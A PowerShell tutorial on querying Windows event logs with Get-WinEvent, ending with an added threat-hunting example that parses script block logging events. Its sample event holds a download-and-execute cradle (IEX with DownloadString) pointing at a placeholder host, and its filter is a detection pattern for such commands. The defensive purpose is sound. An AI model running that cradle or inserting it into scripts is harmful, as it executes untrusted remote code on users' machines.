EventLog

EventLog stores log information for the whole system via Event Tracing for Windows (ETW). For troubleshooting purposes, it is always worth taking a dedicated look at the logs to find further information. PowerShell makes this easy for us with two cmdlets: Get-EventLog and Get-WinEvent. Get-WinEvent is the newer cmdlet: it can also read the Applications and Services logs (including ETW-based logs such as Microsoft-Windows-PowerShell/Operational) and it filters on the server side, so only matching records are returned to the pipeline. Get-EventLog returns objects of the type System.Diagnostics.EventLogEntry, whereas Get-WinEvent returns objects of the type System.Diagnostics.Eventing.Reader.EventLogRecord. There are significant differences in the properties: Source becomes ProviderName, EntryType becomes LevelDisplayName, and Category becomes TaskDisplayName. In addition, the replacement strings (the per-event data values) are not exposed as named properties; they are available through the Properties collection or in the XML returned by the record's ToXml() method. The main reason for preferring Get-WinEvent, though, is performance: filtering inside the event log service instead of in the PowerShell pipeline is considerably faster on large logs. Get-EventLog is also only available in Windows PowerShell, not in PowerShell Core. That is why we will only focus on the Get-WinEvent cmdlet:

#List all registered event providers (use -ListLog * to list the logs themselves)
Get-WinEvent -ListProvider * | Format-Table

#List all event providers for PowerShell.
Get-WinEvent -ListProvider *PowerShell* | Format-Table

#List the logs for PowerShell
Get-WinEvent -ListLog *PowerShell*

#List all possible event IDs and descriptions for Microsoft-Windows-PowerShell
(Get-WinEvent -ListProvider Microsoft-Windows-PowerShell).Events |
Format-Table Id, Description -AutoSize

#List all of the event log entries for operational PowerShell information
Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational

#Retrieve the event definition for event ID 4103 (module logging) from the provider
(Get-WinEvent -ListProvider Microsoft-Windows-PowerShell).Events | Where-Object {$_.Id -eq 4103}

#Find an event ID across all ETW providers (some providers cannot be read and would
#otherwise emit errors, hence -ErrorAction SilentlyContinue)
Get-WinEvent -ListProvider * -ErrorAction SilentlyContinue | ForEach-Object { $_.Events | Where-Object {$_.Id -eq 4103} }

#Retrieving warning entries (Level 3) for PowerShell from the last 24 hours
Get-WinEvent -FilterHashTable @{LogName='Windows PowerShell'; Level=3; StartTime=(Get-Date).AddDays(-1)}

#Find all application crash events for outlook.exe from the last 7 days
Get-WinEvent -FilterHashtable @{LogName="Application"; ProviderName="Application Error"; Data="outlook.exe"; StartTime=(Get-Date).AddDays(-7)}

#Working with the FilterHashTable
#Retrieving the last 10 successfully applied updates (event ID 19 = installation successful)
$filter = @{ ProviderName="Microsoft-Windows-WindowsUpdateClient"; Id=19 }
Get-WinEvent -FilterHashtable $filter | Select-Object -ExpandProperty Message -First 10

#Working with FilterHashTable and converting the properties to an array
#Note: the script block must open on the same line as ForEach-Object;
#on a line of its own PowerShell would prompt for the -Process parameter instead
$filter = @{ ProviderName="Microsoft-Windows-WindowsUpdateClient"; Id=19 }
Get-WinEvent -FilterHashtable $filter |
ForEach-Object {
    # ReplacementStrings array: the Properties collection holds the event data values
    $ReplacementStrings = $_.Properties | ForEach-Object { $_.Value }
    # Creating PSCustomObjects with the array information
    [PSCustomObject]@{
        Time = $_.TimeCreated
        Name = $ReplacementStrings[0] # the first index contains the name of the update
        User = $_.UserId.Value
    }
}

As seen, the usage of the cmdlet is intuitive and straightforward. If you investigate similar problems at the support desk, it makes sense to create templates that search for and retrieve events, and even consolidate the information automatically. Look for patterns in your recurring problems and always try to find the root cause.

The Message property is only the rendered text; the structured event data and the system metadata of a record are exposed as XML through its ToXml() method, as noted above. If you want to filter on those values, read the following link:

https://blogs.technet.microsoft.com/ashleymcglone/2013/08/28/powershell-get-winevent-xml-madness-getting-details-from-event-logs/
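For working with that XML directly, here is an added example that is not part of the original page or its author's code. ConvertFrom-EventXml is a helper function defined in the block (not a built-in cmdlet); the sample record is a constructed stand-in for a Microsoft-Windows-PowerShell/Operational event 4104 (script block logging) with placeholder values, not a captured event; and the live query at the end assumes script block logging is enabled on the machine. It goes a little beyond the page's Properties array by turning every named Data element into a named property, which is what you need when you hunt for specific script content rather than positional values.

```powershell
# Added example: turn the XML body of an EventLogRecord into an object with named fields.
# ConvertFrom-EventXml is a helper defined here; it is not a built-in cmdlet.
function ConvertFrom-EventXml {
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$EventXml
    )
    process {
        $x = [xml]$EventXml
        # Every Windows event uses this namespace; register it so XPath queries resolve
        $ns = New-Object System.Xml.XmlNamespaceManager($x.NameTable)
        $ns.AddNamespace('e', 'http://schemas.microsoft.com/win/2004/08/events/event')

        $fields = [ordered]@{
            EventId     = [int]$x.SelectSingleNode('/e:Event/e:System/e:EventID', $ns).InnerText
            TimeCreated = [datetime]$x.SelectSingleNode('/e:Event/e:System/e:TimeCreated', $ns).GetAttribute('SystemTime')
            Computer    = $x.SelectSingleNode('/e:Event/e:System/e:Computer', $ns).InnerText
        }
        # Each <Data Name="..."> element is one replacement string; its Name attribute
        # becomes the property name (GetAttribute avoids the clash with XmlNode.Name)
        foreach ($d in $x.SelectNodes('/e:Event/e:EventData/e:Data', $ns)) {
            $fields[$d.GetAttribute('Name')] = $d.InnerText
        }
        [PSCustomObject]$fields
    }
}

# Constructed sample record (placeholder values, not a captured event) in the shape
# a 4104 script block logging event has when returned by $record.ToXml()
$sampleXml = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-PowerShell" />
    <EventID>4104</EventID>
    <Level>5</Level>
    <TimeCreated SystemTime="2024-01-01T12:00:00.0000000Z" />
    <Channel>Microsoft-Windows-PowerShell/Operational</Channel>
    <Computer>example-host</Computer>
  </System>
  <EventData>
    <Data Name="MessageNumber">1</Data>
    <Data Name="MessageTotal">1</Data>
    <Data Name="ScriptBlockText">IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')</Data>
    <Data Name="ScriptBlockId">00000000-0000-0000-0000-000000000000</Data>
    <Data Name="Path"></Data>
  </EventData>
</Event>
'@

# Offline run against the constructed record
$sampleXml | ConvertFrom-EventXml | Select-Object EventId, TimeCreated, ScriptBlockText

# Live run: the event ID is filtered server-side with XPath. The event log XPath subset
# has no contains(), so the text match on ScriptBlockText is done client-side afterwards.
$xpath = "*[System[EventID=4104]]"
Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -FilterXPath $xpath -MaxEvents 500 -ErrorAction SilentlyContinue |
    ForEach-Object { $_.ToXml() } |
    ConvertFrom-EventXml |
    Where-Object { $_.ScriptBlockText -match 'DownloadString|FromBase64String|-EncodedCommand' } |
    Select-Object TimeCreated, Computer, ScriptBlockId, ScriptBlockText
```

The pattern list in the final Where-Object is illustrative; tune it to what you are actually hunting for. Keep the server-side part of the filter (log name, event ID, time window) as tight as possible, because everything after ToXml() runs in the pipeline and pays the per-record parsing cost.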